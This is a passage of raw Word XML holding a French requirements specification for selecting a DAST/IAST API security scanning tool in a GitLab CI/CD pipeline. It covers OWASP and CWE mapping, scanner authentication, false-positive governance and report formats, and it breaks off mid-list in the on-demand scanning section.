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0"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">PSC26 – Controles Securite APIs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Benchmark DAST / IAST – Exigences Fonctionnelles, Exigences Techniques &amp; Prerequis GitLab CI/CD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Ce document definit les exigences fonctionnelles et techniques pour la selection et le deploiement d'une solution DAST/IAST dans le cadre du projet PSC26. Structure en deux sections distinctes : (1) Exigences Fonctionnelles - ce que l'outil doit faire ; (2) Exigences Techniques - comment et avec quelles contraintes. Les scenarios de test et recommandations de benchmark sont en annexe.</w:t>
      </w:r>
    </w:p>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1   Exigences Fonctionnelles</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Les exigences fonctionnelles decrivent les capacites attendues. Elles repondent a la question : que doit faire l'outil ?</w:t>
      </w:r>
    </w:p>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1.1   Perimetre fonctionnel couvert</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">La solution doit couvrir l'ensemble du cycle de vie des APIs sur le perimetre gLBP, depuis le developpement (BUILD) jusqu'a l'exploitation en production (RUN), quel que soit le langage ou le framework utilise.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4300"/>
        <w:gridCol w:w="1000"/>
        <w:gridCol w:w="156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Intitule</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Priorite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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 DORA/PTS</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Decouverte &amp; cartographie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Decouverte automatique des APIs (REST, SOAP, GraphQL, gRPC, WebSocket) incluant shadow/zombie/rogue. Alimentation du catalogue API Authority.</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11.2.B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Scan DAST automatise CI/CD</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Scan DAST integre dans le pipeline GitLab sur env. staging/integration. Coverage OWASP API Top10:2023. Gate bloquant sur CRITICAL.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10.2.A/B</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EF-03</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Scan DAST On-Demand</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Scan planifie ou manuel sur preprod/production. Mode passif + actif limite. Rapport asynchrone vers CSIRT/RSSI. Scans hebdomadaires FCI.</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10.2.B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IAST multi-langages</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Instrumentation IAST en phase de test (BUILD) sans modification du code source. Support Java, Python, Node.js, .NET, Go, PHP. Taint tracking complet.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10.2.A</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Controles durcissement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Verification des configurations securite : headers, TLS, authentification, exposition donnees sensibles. Alignement PTS-MIA-PR-HARDEN.</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PTS-MIA-PR-HARDEN</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Gestion faux positifs persistante</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Requalification (Confirmed/FP/Accepted Risk/Fixed/In Progress). Persistance entre scans. Separation stricte des roles. Audit trail non falsifiable.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10.2.B</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Rapports personnalisables</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Templates : SARIF, JSON, HTML/PDF, CSV. Rapport differentiel. Logo, classification C2 Restreint, contexte projet.</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DICT C:3</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Alimentation VOC / KPI MCS</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Export vers VOC (CVSS, KEV, EPSS, TRS). Indicateurs : nb vulns, severite, taux FP, points de controle.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2.2.C</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EF-09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Fiabilisation catalogue API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Contribution a l'inventaire API Authority (flux nouveaux projets + stock existant). Detection APIs non referencees.</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RTS 8.6 / 11.2.B</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Tracabilite &amp; auditabilite</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Journalisation horodatee de toutes les actions de scan. Retention 1 an. Export audit CSIRT. Lien commit SHA / pipeline GitLab.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Haute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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DICT T:3 / DORA</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1.2   Referentiels de mapping obligatoires</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Chaque finding doit etre mappe sur les referentiels standards. Exigence obligatoire : chaque finding doit referencer au minimum son identifiant CWE et sa categorie OWASP API Top 10.</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1.2.1   OWASP API Security Top 10 : 2023 (referentiel prioritaire PSC26)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00"/>
        <w:gridCol w:w="1400"/>
        <w:gridCol w:w="21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Categorie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CI/CD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On-Demand</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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API1:2023</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Broken Object Level Authorization (BOLA/IDOR)</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API2:2023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Broken Authentication</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API3:2023</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Broken Object Property Level Auth (BOPLA)</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API4:2023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Unrestricted Resource Consumption (URC)</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API5:2023</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Broken Function Level Authorization (BFLA)</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API6:2023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Unrestricted Access to Sensitive Business Flows</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="13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API7:2023</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Server Side Request Forgery (SSRF)</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API8:2023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Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="13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API9:2023</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Improper Inventory Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="13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2126"/>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 applicable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API10:2023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Unsafe Consumption of APIs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="13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14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21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1.2.2   OWASP Top 10 Web :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800"/>
        <w:gridCol w:w="17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Categorie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1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A01:2021</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Broken Access Control</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A02:2021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Cryptographic Failures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A03:2021</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Injection (SQL, LDAP, OS, XXE)</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A05:2021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Security Misconfiguration</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A06:2021</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Vulnerable &amp; Outdated Components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 - detection comportementale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="17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 - execution reelle si lib appelee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A07:2021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Identification &amp; Auth Failures</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A08:2021</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Software &amp; Data Integrity Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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 - payload connu</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 - taint tracking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A09:2021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Security Logging &amp; Monitoring Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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Limite - boite noire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 - execution interne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A10:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>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SSRF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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17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1.2.3   CWE et CVE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426"/>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CWE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Intitule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 primaire</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CWE-89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SQL Injection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SC-01</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CWE-79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Cross-Site Scripting (XSS)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SC-02</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CWE-347</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Improper Verification of Cryptographic Signature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SC-03 - JWT</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CWE-639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IDOR / Broken Object Level Authorization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SC-04</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CWE-502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Deserialization of Untrusted Data</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SC-05</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IAST (primaire)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CWE-918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Server-Side Request Forgery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SC-06</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 IAST</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CWE-312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Cleartext Storage / Exposed Credentials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SC-07 - Hash expose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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CWE-611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XML External Entity (XXE)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SC-08</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 IAST</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE : les CVE identifient des vulnerabilites dans des composants tiers. Le DAST et l'IAST ne sont pas des outils SCA - leur couverture CVE est limitee et indirecte. L'inventaire exhaustif des CVE releve de SDepend/Xray (SCA).</w:t>
      </w:r>
    </w:p>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1.3   DAST CI/CD — Fonctionnalites attendues</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Ce que l'outil DAST integre au pipeline GitLab doit fonctionnellement fournir. Les contraintes techniques associees sont decrites en section 2.</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1.3.1   Decouverte et crawling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Mode coverage-driven (OpenAPI/Swagger) : le scanner parcourt tous les endpoints decrits dans la spec - mode le plus fiable pour les APIs REST</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Mode active scan : crawl automatique sans spec, pour les APIs sans documentation - utile pour la detection d'endpoints non documentes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">HAR replay : enregistrement du trafic applicatif reel et rejeu en mode attaque - indispensable pour les APIs avec flux complexes ou workflows multi-etapes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Support multi-formats : OpenAPI 2.x / 3.x, GraphQL SDL, WSDL (SOAP), AsyncAPI (WebSocket/MQTT)</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1.3.2   Authentification des APIs cibles</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">L'authentification est le point d'echec n1 des DAST mal configures. Un scanner non authentifie ne teste que la surface publique.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026"/>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Mecanisme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Risque si absent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OAuth2 / OIDC</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Client credentials (M2M) et Authorization code. Token refresh automatique pendant le scan.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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50% des endpoints non testes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Bearer JWT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Injection header Authorization. Renouvellement automatise via endpoint configurable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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Scan partiel sans alerte</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Key</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Injection header (X-API-Key) ou query param. Plusieurs cles pour tester differents niveaux de privilege.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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Surface reduite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mTLS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Certificat client configurable (PEM/PKCS12). Necessaire pour les APIs bancaires inter-systemes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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APIs metier non testees</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Basic Auth</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Encore present sur des composants internes ou legacy.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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Couverture partielle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SAML / SSO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Authentification federee (PingFederate). Gestion du flux de redirection SAML.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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SSO non couvert</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1.3.3   Personnalisation des regles de detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Exclusions configurables</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par pattern d'endpoint : exclure /actuator/*, /health, /swagger-ui, /metrics - generent du bruit sans valeur securite</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de la reflexion brute de payload XSS dans le body JSON : une valeur reflechie dans du JSON n'est pas en soi une vulnerabilite. Ne pas desactiver les checks XSS globalement - maintenir la detection sur les headers, le stockage, le Content-Type sniffing et les valeurs JSON consommees par un frontend</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par code HTTP : ne pas traiter les 400/422 comme des vulnerabilites - comportement metier normal de validation des inputs</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par parametre : ne pas fuzzer les parametres d'audit/trace (X-Correlation-ID, X-Request-ID, traceId) - injectables mais uniquement en lecture, generent des FP et polluent les logs d'audit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Reclassification de severite</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Reclasser MEDIUM -&gt; LOW sur des regles specifiques si le contexte metier le justifie (ex : absence de HSTS sur un endpoint interne non expose Internet)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Reclasser HIGH -&gt; MEDIUM pour les vulnerabilites sur des endpoints necessitant un privilege eleve non accessibles sans VPN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Regles custom</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Pouvoir ecrire ses propres regles de detection : verifier qu'un header metier proprietaire est present sur toutes les reponses, ou qu'un champ sensible n'est jamais retourne en clair</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Support selon l'outil : ZAP Automation Framework (Groovy/Python), StackHawk YAML rules, 42Crunch Security Audit rules</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1.3.4   Gestion des faux positifs DAST</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Un DAST sans gestion des FP persistante est inutilisable sur un pipeline recurrent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Workflow de triage natif : Confirmed / False Positive / Accepted Risk / Fixed / In Progress</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Persistance des FP entre les scans : un FP requalifie ne remonte plus dans les runs suivants</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Justification obligatoire : chaque requalification FP doit etre justifiee (champ texte obligatoire) et horodatee avec l'identite de l'auteur</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Separation stricte des roles : le developpeur ne peut pas requalifier seul un finding en FP - validation obligatoire par l'equipe securite</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Expiration obligatoire : chaque FP a une duree de vie maximale (90 jours recommandes) apres laquelle le finding redevient Open automatiquement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Alerting sur abus : notification RSSI si &gt; 5 requalifications FP par le meme utilisateur en 24h</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1B1B" w:sz="1"/>
              <w:left w:val="single" w:color="9C1B1B" w:sz="1"/>
              <w:bottom w:val="single" w:color="9C1B1B" w:sz="1"/>
              <w:right w:val="single" w:color="9C1B1B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F4CCCC"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Exigence critique : seule l'equipe securite peut requalifier un finding en False Positive. Le developpeur peut demander une requalification avec justification, mais ne peut pas l'appliquer seul. Sans ce controle, un developpeur peut vider le gate de securite silencieusement.</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1.3.5   Formats de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2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 attendu</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Personnalisation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SARIF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GitLab Security Dashboard</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Findings structures avec regle, emplacement, severite, CWE</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Filtrage par seuil de severite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JSON brut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VOC / SIEM / SDepend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Tous les findings avec contexte complet (request/response)</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Export filtre par endpoint ou tag</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HTML/PDF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CSIRT / RSSI / Audit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Rapport lisible executif + technique, findings classes</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Logo, classification C2 Restreint, contexte projet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CSV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Suivi qualite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Liste flat des findings pour consolidation</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Colonnes configurables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Differentiel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Suivi regression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Nouveaux findings vs baseline precedent uniquement</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Periode de reference configurable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Recommandation : exiger un rapport differentiel natif. Sur un pipeline recurrent hebdomadaire, un rapport de 200 findings dont 195 deja connus est inutilisable. Seuls les nouveaux findings ont de la valeur operationnelle.</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1.4   DAST On-Demand — Fonctionnalites attendues</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Le DAST on-demand est le vrai audit de securite de l'API en production. Il complete le DAST CI/CD en couvrant la surface reelle exposee, les APIs shadow/zombie, et le drift de configuration post-deploiement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Scan planifie automatique : hebdomadaire obligatoire pour les APIs FCI (RTS 10.2.B), mensuel pour les autres</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Scan manuel declenche a la demande par le CSIRT ou l'equipe securite, sans passer par un pipeline GitLab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
